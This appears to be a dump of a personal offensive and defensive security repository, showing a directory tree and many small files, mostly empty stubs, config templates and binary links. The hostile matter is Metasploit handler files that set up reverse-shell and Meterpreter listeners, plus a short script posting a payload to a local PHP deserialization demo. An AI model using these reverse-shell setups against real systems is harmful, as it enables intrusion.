├── MyTools ├── RedTeam │ ├── massbuster │ │ ├── README.md │ │ ├── hosts │ │ └── config.json │ ├── wgetexec │ │ ├── r.sh │ │ ├── r.ps1 │ │ └── README.md │ └── gorecon │ │ └── ip.txt └── BlueTeam │ ├── irgather │ └── go.mod │ └── evtinfo │ └── evtinfo.go ├── Phishing └── Gophish │ ├── .gitignore │ ├── igw.tf │ ├── associations.tf │ ├── vpc.tf │ ├── routes.tf │ ├── key_pair.tf │ ├── main.tf │ ├── subnets.tf │ ├── outputs.tf │ ├── nacl.tf │ ├── variables.tf │ ├── user-data.sh │ ├── ec2.tf │ ├── email_templates │ └── google-drive.tmpl.html │ └── README.md ├── PyViruses ├── PyBackdoorInjection │ ├── test │ │ ├── test2.py │ │ ├── test3.py │ │ ├── test4.py │ │ └── test1.py │ └── README.md └── BrowserObstruction │ └── obstruct_browsing.py ├── Cryptography ├── Hashing │ ├── test.txt │ ├── generate_wordlist.py │ ├── file_hashing.py │ └── key_derivation_with_scrypt.py ├── SymmetricEncryption │ ├── CSharpAES │ │ ├── obj │ │ │ ├── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── CSharpAES.AssemblyInfoInputs.cache │ │ │ │ │ ├── CSharpAES.genruntimeconfig.cache │ │ │ │ │ ├── CSharpAES.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── CSharpAES.dll │ │ │ │ │ ├── CSharpAES.exe │ │ │ │ │ ├── CSharpAES.pdb │ │ │ │ │ ├── CSharpAES.assets.cache │ │ │ │ │ ├── CSharpAES.csprojAssemblyReference.cache │ │ │ │ │ ├── .NETCoreApp,Version=v3.1.AssemblyAttributes.cs │ │ │ │ │ └── CSharpAES.AssemblyInfo.cs │ │ │ ├── CSharpAES.csproj.nuget.g.targets │ │ │ ├── project.nuget.cache │ │ │ └── CSharpAES.csproj.nuget.g.props │ │ ├── sample.txt.encrypted │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CSharpAES.dll │ │ │ │ ├── CSharpAES.exe │ │ │ │ ├── CSharpAES.pdb │ │ │ │ ├── CSharpAES.runtimeconfig.json │ │ │ │ ├── CSharpAES.runtimeconfig.dev.json │ │ │ │ └── CSharpAES.deps.json │ │ └── CSharpAES.csproj │ ├── bank_messages_info.txt │ ├── quote.bmp │ ├── images │ │ ├── cbc_image.png │ │ └── ecb_image.png │ ├── ecb_image_encryption.py │ └── cbc_image_encryption.py ├── README.md ├── MsgIntegritySignaturesCertificates │ ├── hmac.py │ └── mac.py ├── AsymmetricEncryption │ ├── get_rsa_prime_numbers.py │ ├── homomorphic_rsa.py │ └── brute_force_rsa.py ├── Cryptopals │ └── bases_test.py ├── MoreThanSecrecy │ └── cracking_caesar.py └── LICENSE ├── PortSwiggerAcademy ├── ClientSideAttacks │ ├── WebSockets │ │ └── README.md │ ├── ClickJacking │ │ └── README.md │ ├── DOMBasedVulns │ │ └── README.md │ ├── CrossSiteScripting │ │ └── README.md │ ├── CrossOriginResourceSharing │ │ └── README.md │ ├── CrossSiteRequestForgery │ │ └── README.md │ └── README.md ├── README.md ├── ServerSideAttacks │ ├── README.md │ ├── SQL_Injection │ │ ├── Lab2 │ │ │ └── README.md │ │ ├── Lab1 │ │ │ └── README.md │ │ ├── README.md │ │ ├── Lab3 │ │ │ └── README.md │ │ └── Lab4 │ │ │ └── README.md │ └── Authentication │ │ └── account-lockout-username-enum-turbo-intruder.py └── Wordlists │ ├── usernames.txt │ └── passwords.txt ├── Misc ├── PHPInsecureDeserialization │ ├── pwn.txt │ ├── proof.php │ ├── exploit.sh │ ├── logging.php │ └── attack.php ├── WIFI │ └── WIFIMapper │ │ ├── api.json │ │ └── mac_addr.json ├── Phishing │ └── Pyphish │ │ ├── pyphish │ │ ├── groups │ │ │ ├── users.csv │ │ │ └── menu.py │ │ ├── utils │ │ │ ├── prog_args.py │ │ │ ├── db.py │ │ │ └── autocompleter.py │ │ ├── pages │ │ │ └── menu.py │ │ └── templates │ │ │ └── menu.py │ │ ├── requirements.txt │ │ ├── config.json │ │ ├── README.md │ │ └── Dockerfile ├── ArtOfExploitation │ ├── README.md │ ├── CProgramming │ │ ├── Misc │ │ │ ├── t │ │ │ ├── func_ptrs │ │ │ ├── rand_nums │ │ │ ├── random_nums.c │ │ │ ├── time_ex.c │ │ │ └── func_ptrs.c │ │ ├── Files │ │ │ ├── uid │ │ │ ├── simplenote │ │ │ └── uid.c │ │ └── MemorySegmentation │ │ │ ├── stack_ex │ │ │ ├── memory_segments │ │ │ ├── using_the_heap │ │ │ └── stack_ex.c │ └── Exploitation │ │ ├── envaddr │ │ ├── get_env │ │ ├── notesearch │ │ ├── game_of_chance │ │ ├── notesearch_exp │ │ ├── simple_overflow │ │ ├── notesearch_env_exploit │ │ ├── StackBasedBufferOverflows │ │ ├── auth_overflow │ │ ├── auth_overflow2 │ │ ├── auth_overflow.c │ │ ├── auth_overflow2.c │ │ └── convert_to_big_little_endian.py │ │ ├── get_env.c │ │ ├── getenvaddr.c │ │ ├── hacking.h │ │ ├── exploit_notesearch_env.c │ │ └── exploit_notesearch.c ├── DFIR-Tools │ ├── requirements.txt │ ├── config.ini │ ├── README.md │ ├── colors.py │ └── LICENSE ├── PortScanner │ ├── README.md │ └── portScanner_manjaro_screen_capture.png ├── BufferOverflow │ ├── VulnServer │ │ ├── nmap │ │ │ ├── all_ports │ │ │ └── service_enum │ │ └── ex.py │ └── exploit.py ├── fix-ssh-key.sh ├── BashCyOps │ ├── OS │ │ └── detect-os.sh │ └── IncidentResponse │ │ └── commands_ran_with_sudo.sh ├── AttacksOnSUIDAndEnvVariables │ ├── IfsAndPathSystemFunctionAbuse.c │ ├── PathSystemFunctionAbuse.c │ ├── AbusingLdPreload.c │ ├── AttacksViaUserInput.c │ └── CapabilityLeakingVulnerableProg.c ├── RaceConditions │ ├── check_success.sh │ ├── attackingProgram.c │ └── vulnerableRaceConditionProgram.c ├── shellcode.c ├── YARA │ ├── DetectExeWithIP.yar │ └── ExtractFileIPs.yar ├── ReturnToLibc │ ├── find_bin_bash.c │ └── attack_code.py ├── icmp_redirect_attack.py ├── fail_safe_openvpn.sh ├── Caddy │ └── readme.md ├── TCPAttacks │ ├── SynFloodingAttack │ │ └── tcp_syn_flooding.py │ ├── ResetAttack │ │ └── reset_attack.py │ └── SessionHijacking │ │ └── session_hijacking.py ├── DNSAttacks │ ├── google_redirect.py │ ├── local_dns_cache_poisoning.py │ └── hijack_entire_domain.py ├── ARPAttacks │ └── arp_cache_poisoning.py ├── crawler.py ├── url_download.py ├── UDPPingPongAttack │ ├── ping_pong_trigger.py │ └── udp_server.py ├── simple_backdoor.py ├── python_reverse_shell.py ├── gobust.sh ├── CustomBurpExtensions │ └── BurpAddXForwardedFor.py ├── VPNCreation │ ├── tun_interface.py │ └── tap_interface.py ├── WindowsRegistry │ ├── enumerate_registry_hive.py │ └── change_wallpaper.py └── emailer.py ├── APIProjects ├── GitHub │ ├── api.json │ ├── gitsearch │ └── README.md └── Twitter │ └── CyberCrawler │ ├── requirements.txt │ ├── api.json │ └── prog_args.py ├── CTFs └── TenableCTF │ ├── Thumbnail │ └── rce.php │ ├── RanEncryptionFixed │ └── ref.py │ └── RabbitHole │ └── sol.py ├── OffensiveGo ├── DLL │ ├── DLLGeneration │ │ └── go.mod │ └── DLLInjection │ │ └── main.go ├── NetcatClone │ ├── client │ └── client.go ├── ShellcodeExecution │ └── ViaSyscall │ │ ├── go.mod │ │ └── go.sum ├── README.md ├── HTTPServers │ ├── CredentialHarvester │ │ ├── Roundcube │ │ │ ├── public │ │ │ │ ├── Flaticon.eot │ │ │ │ └── public_files │ │ │ │ │ └── roundcube_logo.png │ │ │ ├── creds.txt │ │ │ └── main.go │ │ └── Netflix │ │ │ ├── creds.txt │ │ │ └── main.go │ ├── simple_server.go │ ├── router.go │ ├── C2Multiplexing │ │ └── main.go │ ├── middleware.go │ └── auth_with_negroni.go ├── DNS │ ├── DNSExfiltration │ │ ├── go.mod │ │ └── go.sum │ └── Clients │ │ └── ARecordQueries │ │ └── main.go ├── SliverStager │ ├── go.mod │ └── go.sum ├── ProcessInjection │ └── SliverStager │ │ ├── color.go │ │ ├── go.mod │ │ └── main.go ├── PortScanner │ └── main.go ├── HTTPClients │ ├── Metasploit │ │ └── client │ │ │ └── main.go │ ├── requests_json_api.go │ └── requests.go └── EchoServer │ └── main.go ├── PhysicalPentestStuff ├── README.md ├── rubberDucky │ └── scripts │ │ ├── README.md │ │ ├── get-wifi-password.txt │ │ └── quick-gather.txt ├── P4wnP1 │ └── HIDscripts │ │ ├── infectWithPythonVirus.js │ │ └── powershell_reverse_shell.js └── LICENSE ├── AntivirusEvasion └── RemoteProcessAttacks │ ├── ShellCodeInject │ └── Python │ │ └── requirements.txt │ └── ProcessHallowing │ └── Python │ └── process_hallow.py ├── Defense ├── CreatingReports │ └── ScreenShots │ │ ├── requirements.txt │ │ └── README.md ├── Canaries │ └── FileCanaries │ │ ├── secrets.txt │ │ ├── README.md │ │ └── emailer.py ├── Forensics │ ├── Python │ │ ├── README.md │ │ └── TheRegistry │ │ │ └── enumerate_windows_version.py │ └── Go │ │ └── README.md ├── Zeek │ └── Learning │ │ ├── switch-case.zeek │ │ ├── vectors.zeek │ │ ├── sets.zeek │ │ ├── events.zeek │ │ ├── records.zeek │ │ ├── tables.zeek │ │ └── check_if_ip_local_or_external.zeek ├── StoredProcedures │ ├── app.sql │ └── stored_procedure.py └── NIST_800_171_COMPLIANT │ └── clamav-download-scan.sh ├── SLAE ├── README.md ├── HelloWorld │ ├── hello │ ├── hello.o │ └── hello.nasm ├── Logical │ ├── logical │ ├── logical.o │ └── logical.nasm ├── TheStack │ ├── stack │ ├── stack.o │ └── stack.nasm ├── Arithmetic │ ├── add_sub │ ├── mul_div │ ├── add_sub.o │ ├── mul_div.o │ └── add_sub.nasm ├── DataTypes │ ├── datatypes │ └── datatypes.o ├── MovingData │ ├── movingdata │ ├── movingdata.o │ └── movingdata.nasm └── compile.sh ├── MalwareAnalysis ├── README.md ├── images │ ├── cff_and_olly_rva.png │ ├── cff_is_file_dll.png │ ├── pe_file_import_dir.png │ └── cff_explorer_dos_header.png └── MalwareAnalysisVMSetup.ps1 ├── TorProjects └── FakeIdentityForTheDarkWeb │ └── requirements.txt ├── HackTheBox ├── README.txt └── Fortune │ └── cmd_inject.py ├── SecureCodeReview ├── OWASP_Code_Review_Guide_v2.pdf ├── code-samples │ ├── sample.3.java.solution.txt │ ├── sample.4.py │ ├── sample.2.java.solution.txt │ ├── sample.1.js.solution.txt │ ├── sample.3.java │ ├── sample.2.java │ └── sample.1.js ├── semgrep │ ├── example-rule2.yml │ ├── example-rule1.yml │ └── README.md ├── container-attack-surface-minimization │ ├── secure-go-build-example.dockerfile │ └── README.md ├── go │ └── xss │ │ ├── basic-xss.go │ │ └── basic_xss_validation.go ├── ruby │ └── command-injection │ │ └── README.md ├── secure-code-practices │ └── README.md └── README.md ├── MetasploitRCFiles ├── linux_x64_shell_handler.rc ├── linux_x86_shell_handler.rc ├── windows_x86_shell_handler.rc ├── windows_x64_shell_handler.rc ├── linux_x64_meterpreter_handler.rc ├── linux_x86_meterpreter_handler.rc ├── windows_x86_meterpreter_handler.rc └── windows_x64_meterpreter_handler.rc ├── DockerStuff ├── MalwareAnalysis │ ├── docker-compose.yml │ └── cyberchef.dockerfile ├── C2Deployments │ ├── nginx │ │ ├── main.conf │ │ ├── index.html │ │ └── Dockerfile │ └── silent_trinity.dockerfile ├── VulnerableDeployments │ └── CVE-2021-3156 │ │ └── Dockerfile └── BugBounty │ └── Dockerfile ├── C2Routing ├── caddy │ ├── webdav_server │ │ └── Caddyfile │ └── example_redirector │ │ └── Caddyfile └── nginx │ └── msf_c2_rev_proxy.nginx ├── NucleiTemplates ├── nuclei.yaml.tmpl ├── aws-key-extractor.yaml ├── host-header-ssrf.yaml └── log4shell-detect.yaml ├── Burp ├── CustomActions │ ├── SendUnauthenticatedRequest.java │ ├── CheckForCRLFHeaderInjection.java │ ├── ArbitraryHeaderReflection.java │ ├── QueryParamXSSInjection.java │ ├── HttpParameterPollutionCheck.java │ └── DetectOpenCORSPolicy.java └── Bambdas │ ├── filterOutImages.java │ ├── filterOutImages.json │ ├── IdentifyCachingOracles.java │ ├── highlightPerHttpMethod.java │ └── highlightPerHttpMethod.json ├── MicrosoftAttacks ├── MSHTA │ └── payload.hta ├── MSBuild │ └── TaskTemplate.cs ├── CSharp │ └── powershell.cs ├── readme.md └── Word │ └── python_reverse_shell_macro.txt ├── NSE ├── template.nse └── http-server-header-enum.nse ├── HackingVMs └── blackarch.md ├── WebAppSecurity ├── owasp-api-top-ten │ └── README.md └── ci-cd │ └── README.md ├── tools.sh ├── PyPersistence └── PersistenceViaWindowsRegistry │ └── simple_backdoor.py ├── IntegrationDeliveryDeployment └── top-10-cicd-security-risks │ └── README.md ├── IncidentResponse └── finding_evil.md ├── CheatSheets └── aws-security-best-practices.md ├── AmazonWebServices └── security-services │ └── README.md ├── Containerization └── kubernetes │ └── top-10-security-best-practices-checklist │ └── README.md ├── SnortRules └── boleto.rules └── LearningResources └── README.md /MyTools/RedTeam/massbuster/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/r.sh: -------------------------------------------------------------------------------- 1 | ls -la 2 | -------------------------------------------------------------------------------- /Phishing/Gophish/.gitignore: -------------------------------------------------------------------------------- 1 | id_rsa.pub 2 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test2.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test3.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test4.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cryptography/Hashing/test.txt: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/massbuster/hosts: -------------------------------------------------------------------------------- 1 | twitter.com 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/gorecon/ip.txt: -------------------------------------------------------------------------------- 1 | scanme.nmap.org 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/r.ps1: -------------------------------------------------------------------------------- 1 | Write-Host "Hello" 2 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/WebSockets/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/pwn.txt: -------------------------------------------------------------------------------- 1 | you have been pwned 2 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/ClickJacking/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/DOMBasedVulns/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /APIProjects/GitHub/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "personal_access_token": "" 3 | } -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossSiteScripting/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/requirements.txt: -------------------------------------------------------------------------------- 1 | gsread 2 | tweepy 3 | -------------------------------------------------------------------------------- /CTFs/TenableCTF/Thumbnail/rce.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /OffensiveGo/DLL/DLLGeneration/go.mod: -------------------------------------------------------------------------------- 1 | module dll-gen 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossOriginResourceSharing/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossSiteRequestForgery/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Misc/WIFI/WIFIMapper/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "api_name": "", 3 | "api_token": "" 4 | } -------------------------------------------------------------------------------- /PhysicalPentestStuff/README.md: -------------------------------------------------------------------------------- 1 | # Scripts for Physical Pentesting Devices 2 | -------------------------------------------------------------------------------- /AntivirusEvasion/RemoteProcessAttacks/ShellCodeInject/Python/requirements.txt: -------------------------------------------------------------------------------- 1 | psutil 2 | -------------------------------------------------------------------------------- /Defense/CreatingReports/ScreenShots/requirements.txt: -------------------------------------------------------------------------------- 1 | pillow 2 | pyscreenshot 3 | colored -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/groups/users.csv: -------------------------------------------------------------------------------- 1 | First Name,Last Name,Position,Email 2 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/requirements.txt: -------------------------------------------------------------------------------- 1 | gophish 2 | tinydb 3 | colored 4 | tabulate 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/README.md: -------------------------------------------------------------------------------- 1 | ### Code written while reading The Art of Exploitation 2 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/requirements.txt: -------------------------------------------------------------------------------- 1 | colored 2 | pytenable 3 | ipython 4 | folium 5 | tabulate -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/proof.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /SLAE/README.md: -------------------------------------------------------------------------------- 1 | # Pentester Academy 2 | x86 Assembly Language and Shellcoding on Linux 3 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/secrets.txt: -------------------------------------------------------------------------------- 1 | email: john_wick@continential.com 2 | password: babayaga -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/HelloWorld/hello -------------------------------------------------------------------------------- /SLAE/Logical/logical: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Logical/logical -------------------------------------------------------------------------------- /SLAE/TheStack/stack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/TheStack/stack -------------------------------------------------------------------------------- /SLAE/TheStack/stack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/TheStack/stack.o -------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/add_sub -------------------------------------------------------------------------------- /SLAE/Arithmetic/mul_div: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/mul_div -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/HelloWorld/hello.o -------------------------------------------------------------------------------- /SLAE/Logical/logical.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Logical/logical.o -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "api_key": "", 3 | "host": "https://localhost:3333" 4 | } 5 | -------------------------------------------------------------------------------- /Misc/PortScanner/README.md: -------------------------------------------------------------------------------- 1 | # Python Port Scanner 2 | ![screenshot](portScanner_manjaro_screen_capture.png) 3 | -------------------------------------------------------------------------------- /Misc/WIFI/WIFIMapper/mac_addr.json: -------------------------------------------------------------------------------- 1 | { 2 | "mac_addrs": [ 3 | "88:75:56:14:D2:85" 4 | ] 5 | } 6 | -------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/add_sub.o -------------------------------------------------------------------------------- /SLAE/Arithmetic/mul_div.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/mul_div.o -------------------------------------------------------------------------------- /SLAE/DataTypes/datatypes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/DataTypes/datatypes -------------------------------------------------------------------------------- /SLAE/DataTypes/datatypes.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/DataTypes/datatypes.o -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/MovingData/movingdata -------------------------------------------------------------------------------- /APIProjects/GitHub/gitsearch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/APIProjects/GitHub/gitsearch -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/MovingData/movingdata.o -------------------------------------------------------------------------------- /OffensiveGo/NetcatClone/client: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/NetcatClone/client -------------------------------------------------------------------------------- /MalwareAnalysis/README.md: -------------------------------------------------------------------------------- 1 | Personal notes and scripts created while reading **Malware Analysis and Detection Engineering** 2 | -------------------------------------------------------------------------------- /OffensiveGo/ShellcodeExecution/ViaSyscall/go.mod: -------------------------------------------------------------------------------- 1 | module viasyscall 2 | 3 | go 1.17 4 | 5 | require golang.org/x/sys v0.1.0 6 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/exploit.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | PARAM=$1 4 | curl -X POST -d "param=$PARAM" localhost/demo.php 5 | -------------------------------------------------------------------------------- /TorProjects/FakeIdentityForTheDarkWeb/requirements.txt: -------------------------------------------------------------------------------- 1 | stem 2 | requests 3 | pysocks 4 | fake_useragent 5 | bs4 6 | colored 7 | prettytable 8 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | ba201520a5db730041990ee06351385fb711162e 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 86c8e15dd33445635927cfaf398408205fd11473 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/bank_messages_info.txt: -------------------------------------------------------------------------------- 1 | Ace Inc,Alberto M.,123.00 2 | Evil Corp,Hamlet B.,230.00 3 | Google, Martha R.,500.00 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/quote.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/quote.bmp -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_and_olly_rva.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_and_olly_rva.png -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_is_file_dll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_is_file_dll.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/t: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/t -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/envaddr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/envaddr -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/get_env: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/get_env -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/nmap/all_ports: -------------------------------------------------------------------------------- 1 | # Nmap 7.91 scan initiated Mon Nov 16 16:55:58 2020 as: nmap -p- -oN nmap/all_ports 192.168.91.129 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a1fe76e20690eb46b23e92211506cc1c2fb2b672 2 | -------------------------------------------------------------------------------- /HackTheBox/README.txt: -------------------------------------------------------------------------------- 1 | # HackTheBox 2 | 3 | This repo will contain any payloads or exploits I've used or created while pawning boxes on HackTheBox 4 | -------------------------------------------------------------------------------- /MalwareAnalysis/images/pe_file_import_dir.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/pe_file_import_dir.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/uid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Files/uid -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch -------------------------------------------------------------------------------- /Defense/CreatingReports/ScreenShots/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | ``` 4 | pip3 install -r requirements.txt 5 | 6 | python3 screenshots.py --help 7 | ``` 8 | -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/nmap/service_enum: -------------------------------------------------------------------------------- 1 | # Nmap 7.91 scan initiated Mon Nov 16 17:03:29 2020 as: nmap -sC -sV -oN nmap/service_enum 192.168.91.129 2 | -------------------------------------------------------------------------------- /SecureCodeReview/OWASP_Code_Review_Guide_v2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SecureCodeReview/OWASP_Code_Review_Guide_v2.pdf -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_explorer_dos_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_explorer_dos_header.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/rand_nums: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/rand_nums -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/game_of_chance: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/game_of_chance -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch_exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch_exp -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/simple_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/simple_overflow -------------------------------------------------------------------------------- /MyTools/BlueTeam/irgather/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/binexisHATT/irgather 2 | 3 | go 1.16 4 | 5 | require github.com/manifoldco/promptui v0.8.0 // indirect 6 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/images/cbc_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/images/cbc_image.png -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/images/ecb_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/images/ecb_image.png -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x64_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x64/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x86_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x86/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x86_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/simplenote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Files/simplenote -------------------------------------------------------------------------------- /Misc/DFIR-Tools/config.ini: -------------------------------------------------------------------------------- 1 | [ip_quality_score] 2 | api_key = None 3 | 4 | [threat_intelligence_platform] 5 | api_key = None 6 | 7 | [virus_total] 8 | api_key = None -------------------------------------------------------------------------------- /Phishing/Gophish/igw.tf: -------------------------------------------------------------------------------- 1 | resource 